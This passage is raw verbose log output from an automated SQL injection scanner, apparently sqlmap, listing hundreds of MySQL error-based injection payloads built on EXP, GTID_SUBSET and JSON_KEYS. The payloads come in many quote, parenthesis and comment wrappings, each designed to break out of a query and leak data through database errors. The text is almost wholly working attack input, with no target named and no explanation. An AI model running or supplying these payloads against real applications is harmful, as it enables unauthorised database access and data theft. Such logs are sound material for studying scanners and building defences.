[10:59:26] [PAYLOAD] 1212")) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (("MTyq"="MTyq
[10:59:26] [PAYLOAD] 1212"))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((("LcxR"="LcxR
[10:59:26] [PAYLOAD] 1212" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND "RDxe"="RDxe
[10:59:26] [PAYLOAD] 1212") OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ("jmWk" LIKE "jmWk
[10:59:26] [PAYLOAD] 1212")) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (("qeqM" LIKE "qeqM
[10:59:26] [PAYLOAD] 1212"))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((("MhlJ" LIKE "MhlJ
[10:59:26] [PAYLOAD] 1212" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND "VUaA" LIKE "VUaA
[10:59:26] [PAYLOAD] 1212 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- mXHu
[10:59:26] [PAYLOAD] 1212 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))# KgCD
[10:59:26] [PAYLOAD] 1212' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) OR 'nbWi'='qLJL
[10:59:26] [PAYLOAD] 1212') WHERE 2783=2783 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- NYSz
[10:59:26] [PAYLOAD] 1212") WHERE 4733=4733 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- IBzT
[10:59:26] [PAYLOAD] 1212) WHERE 4304=4304 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- HkOy
[10:59:26] [PAYLOAD] 1212' WHERE 5398=5398 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- wAau
[10:59:26] [PAYLOAD] 1212" WHERE 8403=8403 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- JGSC
[10:59:26] [PAYLOAD] 1212 WHERE 5286=5286 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- RJyd
[10:59:26] [PAYLOAD] 1212'||(SELECT 0x596f494d WHERE 7161=7161 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))||'
[10:59:26] [PAYLOAD] 1212'||(SELECT 0x62696569 FROM DUAL WHERE 5218=5218 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))||'
[10:59:26] [PAYLOAD] 1212'+(SELECT 0x67615368 WHERE 9561=9561 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))+'
[10:59:26] [PAYLOAD] 1212||(SELECT 0x4a624162 FROM DUAL WHERE 4597=4597 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))||
[10:59:26] [PAYLOAD] 1212||(SELECT 0x4e676879 WHERE 9786=9786 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))||
[10:59:26] [PAYLOAD] 1212+(SELECT qelJ WHERE 8471=8471 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))+
[10:59:26] [PAYLOAD] 1212+(SELECT 0x79764977 WHERE 9830=9830 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))+
[10:59:26] [PAYLOAD] 1212')) AS Qrhp WHERE 2148=2148 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- pEaV
[10:59:26] [PAYLOAD] 1212")) AS fkzc WHERE 1800=1800 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- yPpo
[10:59:26] [PAYLOAD] 1212)) AS SQRn WHERE 1096=1096 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- DIOP
[10:59:26] [PAYLOAD] 1212') AS WwsB WHERE 7253=7253 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- VryT
[10:59:26] [PAYLOAD] 1212") AS Ruhp WHERE 7886=7886 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- gEWR
[10:59:26] [PAYLOAD] 1212) AS PypN WHERE 7102=7102 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- AzVU
[10:59:26] [PAYLOAD] 1212` WHERE 7722=7722 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- IeVN
[10:59:26] [PAYLOAD] 1212`) WHERE 4578=4578 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- OGoR
[10:59:26] [PAYLOAD] 1212`=`1212` OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND `1212`=`1212
[10:59:26] [PAYLOAD] 1212"="1212" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND "1212"="1212
[10:59:26] [PAYLOAD] 1212]-(SELECT 0 WHERE 9115=9115 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))|[1212
[10:59:26] [PAYLOAD] 1212' IN BOOLEAN MODE) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))#
[10:59:26] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[10:59:26] [PAYLOAD] 1212) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- yhnW
[10:59:26] [PAYLOAD] 1212') AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- wjjk
[10:59:26] [PAYLOAD] 1212' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- ljDy
[10:59:26] [PAYLOAD] 1212" AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- eJxu
[10:59:26] [PAYLOAD] 1212) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (7945=7945
[10:59:26] [PAYLOAD] 1212)) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((2994=2994
[10:59:26] [PAYLOAD] 1212))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (((1250=1250
[10:59:26] [PAYLOAD] 1212 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)
[10:59:26] [PAYLOAD] 1212') AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ('JNhh'='JNhh
[10:59:26] [PAYLOAD] 1212')) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (('CojR'='CojR
[10:59:26] [PAYLOAD] 1212'))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((('Gwwr'='Gwwr
[10:59:26] [PAYLOAD] 1212' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND 'PeWY'='PeWY
[10:59:26] [PAYLOAD] 1212') AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ('fnWr' LIKE 'fnWr
[10:59:26] [PAYLOAD] 1212')) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (('wNuP' LIKE 'wNuP
[10:59:26] [PAYLOAD] 1212'))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((('UXPm' LIKE 'UXPm
[10:59:26] [PAYLOAD] 1212%' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND 'LHTE%'='LHTE
[10:59:26] [PAYLOAD] 1212' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND 'nEgJ' LIKE 'nEgJ
[10:59:26] [PAYLOAD] 1212") AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ("LTKB"="LTKB
[10:59:26] [PAYLOAD] 1212")) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (("biqr"="biqr
[10:59:26] [PAYLOAD] 1212"))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((("Susy"="Susy
[10:59:26] [PAYLOAD] 1212" AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND "JXwQ"="JXwQ
[10:59:26] [PAYLOAD] 1212") AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ("uScs" LIKE "uScs
[10:59:26] [PAYLOAD] 1212")) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (("SShP" LIKE "SShP
[10:59:26] [PAYLOAD] 1212"))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((("REIE" LIKE "REIE
[10:59:26] [PAYLOAD] 1212" AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND "WBiA" LIKE "WBiA
[10:59:26] [PAYLOAD] 1212 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- VKUg
[10:59:26] [PAYLOAD] 1212 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)# CfDf
[10:59:26] [PAYLOAD] 1212' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) OR 'XhvQ'='MRhV
[10:59:26] [PAYLOAD] 1212') WHERE 7448=7448 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- Pefo
[10:59:26] [PAYLOAD] 1212") WHERE 2704=2704 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- Gwgs
[10:59:26] [PAYLOAD] 1212) WHERE 2372=2372 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- VkFk
[10:59:27] [PAYLOAD] 1212' WHERE 4193=4193 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- GZLk
[10:59:27] [PAYLOAD] 1212" WHERE 4580=4580 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- PhwN
[10:59:27] [PAYLOAD] 1212 WHERE 7789=7789 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- gRUA
[10:59:27] [PAYLOAD] 1212'||(SELECT 0x6a425a6f WHERE 8451=8451 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))||'
[10:59:27] [PAYLOAD] 1212'||(SELECT 0x464f4a42 FROM DUAL WHERE 1226=1226 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))||'
[10:59:27] [PAYLOAD] 1212'+(SELECT 0x47486f6e WHERE 3320=3320 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))+'
[10:59:27] [PAYLOAD] 1212||(SELECT 0x6d787559 FROM DUAL WHERE 5069=5069 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))||
[10:59:27] [PAYLOAD] 1212||(SELECT 0x76716269 WHERE 6447=6447 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))||
[10:59:27] [PAYLOAD] 1212+(SELECT gUSh WHERE 7979=7979 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))+
[10:59:27] [PAYLOAD] 1212+(SELECT 0x4c6c504f WHERE 7995=7995 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))+
[10:59:27] [PAYLOAD] 1212')) AS rYaW WHERE 4588=4588 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- WXYb
[10:59:27] [PAYLOAD] 1212")) AS dNTr WHERE 5425=5425 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- BOPV
[10:59:27] [PAYLOAD] 1212)) AS FcxE WHERE 2926=2926 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- rkcg
[10:59:27] [PAYLOAD] 1212') AS xuHV WHERE 6950=6950 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- zDpp
[10:59:27] [PAYLOAD] 1212") AS HEXl WHERE 4354=4354 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- NJdC
[10:59:27] [PAYLOAD] 1212) AS jfPd WHERE 7124=7124 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- vzuC
[10:59:27] [PAYLOAD] 1212` WHERE 4583=4583 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- Nnud
[10:59:27] [PAYLOAD] 1212`) WHERE 8678=8678 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- mMDF
[10:59:27] [PAYLOAD] 1212`=`1212` AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND `1212`=`1212
[10:59:27] [PAYLOAD] 1212"="1212" AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND "1212"="1212
[10:59:27] [PAYLOAD] 1212]-(SELECT 0 WHERE 3343=3343 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))|[1212
[10:59:27] [PAYLOAD] 1212' IN BOOLEAN MODE) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)#
[10:59:27] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[10:59:27] [PAYLOAD] 1212) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- WgYN
[10:59:27] [PAYLOAD] 1212') OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- rMhb
[10:59:27] [PAYLOAD] 1212' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- mHOA
[10:59:27] [PAYLOAD] 1212" OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- yrfq
[10:59:27] [PAYLOAD] 1212) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (4689=4689
[10:59:27] [PAYLOAD] 1212)) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((4733=4733
[10:59:27] [PAYLOAD] 1212))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (((6341=6341
[10:59:27] [PAYLOAD] 1212 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)
[10:59:27] [PAYLOAD] 1212') OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ('OWuA'='OWuA
[10:59:27] [PAYLOAD] 1212')) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (('Hbvu'='Hbvu
[10:59:27] [PAYLOAD] 1212'))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((('Mjsc'='Mjsc
[10:59:27] [PAYLOAD] 1212' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND 'eyiP'='eyiP
[10:59:27] [PAYLOAD] 1212') OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ('Nyme' LIKE 'Nyme
[10:59:27] [PAYLOAD] 1212')) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (('fuyU' LIKE 'fuyU
[10:59:27] [PAYLOAD] 1212'))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((('VIiq' LIKE 'VIiq
[10:59:27] [PAYLOAD] 1212%' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND 'QhRq%'='QhRq
[10:59:27] [PAYLOAD] 1212' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND 'ECOm' LIKE 'ECOm
[10:59:27] [PAYLOAD] 1212") OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ("KmXh"="KmXh
[10:59:27] [PAYLOAD] 1212")) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (("RAQR"="RAQR
[10:59:27] [PAYLOAD] 1212"))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((("pXHW"="pXHW
[10:59:27] [PAYLOAD] 1212" OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND "AzaC"="AzaC
[10:59:27] [PAYLOAD] 1212") OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ("yEFj" LIKE "yEFj
[10:59:27] [PAYLOAD] 1212")) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (("VdMY" LIKE "VdMY
[10:59:27] [PAYLOAD] 1212"))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((("yScL" LIKE "yScL
[10:59:27] [PAYLOAD] 1212" OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND "IBRt" LIKE "IBRt
[10:59:27] [PAYLOAD] 1212 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- JvOM
[10:59:27] [PAYLOAD] 1212 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)# ChAb
[10:59:27] [PAYLOAD] 1212' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) OR 'VLyb'='VYvA
[10:59:27] [PAYLOAD] 1212') WHERE 9922=9922 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- RIHb
[10:59:27] [PAYLOAD] 1212") WHERE 5408=5408 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- tazo
[10:59:27] [PAYLOAD] 1212) WHERE 5843=5843 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- mOcy
[10:59:27] [PAYLOAD] 1212' WHERE 3845=3845 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- wTcs
[10:59:27] [PAYLOAD] 1212" WHERE 8370=8370 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- Dwif
[10:59:27] [PAYLOAD] 1212 WHERE 8861=8861 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- Iech
[10:59:27] [PAYLOAD] 1212'||(SELECT 0x51565052 WHERE 5529=5529 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))||'
[10:59:27] [PAYLOAD] 1212'||(SELECT 0x54697957 FROM DUAL WHERE 6150=6150 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))||'
[10:59:27] [PAYLOAD] 1212'+(SELECT 0x644f5351 WHERE 8069=8069 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))+'
[10:59:27] [PAYLOAD] 1212||(SELECT 0x62424d61 FROM DUAL WHERE 2344=2344 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))||
[10:59:27] [PAYLOAD] 1212||(SELECT 0x726b6672 WHERE 2540=2540 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))||
[10:59:27] [PAYLOAD] 1212+(SELECT OoAo WHERE 9474=9474 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))+
[10:59:27] [PAYLOAD] 1212+(SELECT 0x61766846 WHERE 9537=9537 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))+
[10:59:27] [PAYLOAD] 1212')) AS LdwG WHERE 6483=6483 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- cIjA
[10:59:27] [PAYLOAD] 1212")) AS rIwV WHERE 6337=6337 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- yLuP
[10:59:27] [PAYLOAD] 1212)) AS Lsyh WHERE 4515=4515 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- HWai
[10:59:28] [PAYLOAD] 1212') AS fTxt WHERE 2307=2307 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- WWPK
[10:59:28] [PAYLOAD] 1212") AS QYSy WHERE 6563=6563 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- gqMA
[10:59:28] [PAYLOAD] 1212) AS lhuX WHERE 9747=9747 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- aVNi
[10:59:28] [PAYLOAD] 1212` WHERE 5524=5524 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- xnRR
[10:59:28] [PAYLOAD] 1212`) WHERE 2149=2149 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- pXMe
[10:59:28] [PAYLOAD] 1212`=`1212` OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND `1212`=`1212
[10:59:28] [PAYLOAD] 1212"="1212" OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND "1212"="1212
[10:59:28] [PAYLOAD] 1212]-(SELECT 0 WHERE 7667=7667 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))|[1212
[10:59:28] [PAYLOAD] 1212' IN BOOLEAN MODE) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)#
[10:59:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:59:28] [PAYLOAD] 1212) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- RgAt
[10:59:28] [PAYLOAD] 1212') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- wbkR
[10:59:28] [PAYLOAD] 1212' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- BITV
[10:59:28] [PAYLOAD] 1212" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- zgRe
[10:59:28] [PAYLOAD] 1212) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (7667=7667
[10:59:28] [PAYLOAD] 1212)) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((8902=8902
[10:59:28] [PAYLOAD] 1212))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (((7893=7893
[10:59:28] [PAYLOAD] 1212 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))
[10:59:28] [PAYLOAD] 1212') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ('BFqp'='BFqp
[10:59:28] [PAYLOAD] 1212')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (('wgCu'='wgCu
[10:59:28] [PAYLOAD] 1212'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((('PpMp'='PpMp
